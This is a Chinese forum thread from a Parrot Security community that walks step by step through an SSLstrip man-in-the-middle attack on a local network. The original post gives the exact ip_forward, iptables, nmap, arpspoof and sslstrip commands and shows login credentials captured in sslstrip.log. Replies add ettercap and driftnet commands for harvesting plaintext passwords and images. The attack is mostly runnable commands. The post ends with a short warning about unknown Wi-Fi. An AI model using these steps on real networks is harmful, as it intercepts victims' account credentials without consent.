简单说说利用parrot进行SSLstrip

无线攻击

#1

简单说说利用parrot进行SSLstrip

[TOC]

0x00前记

今天看了个视频,学习到了如何进行 SSLstrip.我们ParrotSec作为一个渗透测试系统,在论坛里竟然没有看到这个的教程,我就来补一个缺,顺便作为学习笔记.由于刚刚学会,只知道如何操作,不懂原理.如果有知道的大神可以在评论区为大家补充.

在这里我演示会使用到 **ParrotSec**和虚拟机 Windows7.

0x01介绍

我们的目标是尝试访问使用 https 网站的用户. 路由器(网关)会把受害者的访问请求发送给我们,而攻击者会把 https 转换成 http 协议,然后扣下报文中的 用户名密码. 攻击者会把请求报文发回给路由器(网关). 然后路由器会把这个新的请求发送给网站,这就是大概的攻击机制.

----以上来自视频字幕

0x02具体步骤

实施攻击的时候我们需要和目标机在同一局域网,也需要获取到目标主机的ip地址.

首先我们需要打开终端,输入 ifconfig 来查看我们的网卡

ifconfig

eth0代表有线网卡,wlan0代表无线网卡. 我使用到的是WiFi无线连接,所以查看wlan0这里,记住自己的ip地址后面需要使用.

接下来我们需要输入一条命令

 echo 1 > /proc/sys/net/ipv4/ip_forward

这条命令具体什么意思我也不是很清楚,好像是把输出重定向到ip_forward这个文件

他这里显示Permission denied(拒绝访问),我们进入root用户,再执行一次,成功了.

接下来配置路由表(iptables),把80端口的数据传送到8080端口,也就是SSL欺骗需要监听的端口

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

现在我们需要找到网关的IP地址,输入 route -n, GateWay 显示的就是网关地址了

route -n

这里是192.168.1.1,这个要记下来

现在使用nmap获取目标主机的地址,在终端输入

nmap -sP [网关地址]/24

我也不知道为什么好像只查到了网关的ip,而目标机的ip没有nmap出来, 请大佬指教
现在作个小小的弊,直接在目标机上查到了ip,为192.168.1.100 (⊙﹏⊙)b

接下来我们进行欺骗

arpspoof -i [网卡] -t [目标ip] [网关ip]
arpspoof -i wlan0 -t 192.168.1.100 192.168.1.1

然后新开一个终端开始监听

sslstrip -l 8080

好这样就准备完成了,只需要等待目标机进行登录操作我们就可以截取到报文

现在我们做一个测试,用目标机打开jd,可以看到 https变成了 http

我们尝试着输入账户密码, 登录成功


打开终端,输入cat sslstrip.log

cat sslstrip.log

可以看到报文最后一条是jd的,里面明文显示这我的账号和密码.

所以 成功了 就这样

0x03后记

其实大家生活中要注意一点不要随意连接不明WiFi,账户密码很容易泄露. 我还测试了一下taobao的密码是加密的,jd没有加密就这样明文发送

小小萌新露个脸,大佬轻喷


#3

补充个小Tip:

在使用arpspoof进行流量转发的时候

如果目标机器是使用无线连接的网络,则需要反向转发,即先网关,后ip

命令应该为:arpspoof -i eth0 -t 192.168.1.1(网关) 192.168.1.*(ip)


#4

另外:

在启动arp欺骗后,可以使用

driftnet -i eth0

截获经过本地网卡的图片

和使用

ettercap -Tq -i eth0

实时截获受害者http明文传输的密码


#5

echo 1 > /proc/sys/net/ipv4/ip_forward 命令是打开linux的IP转发功能,默认状态是禁止的
内网中间人攻击的话,我比较喜欢ettercap,用ettercap -G 来启动图形界面


Partners Wiki IRC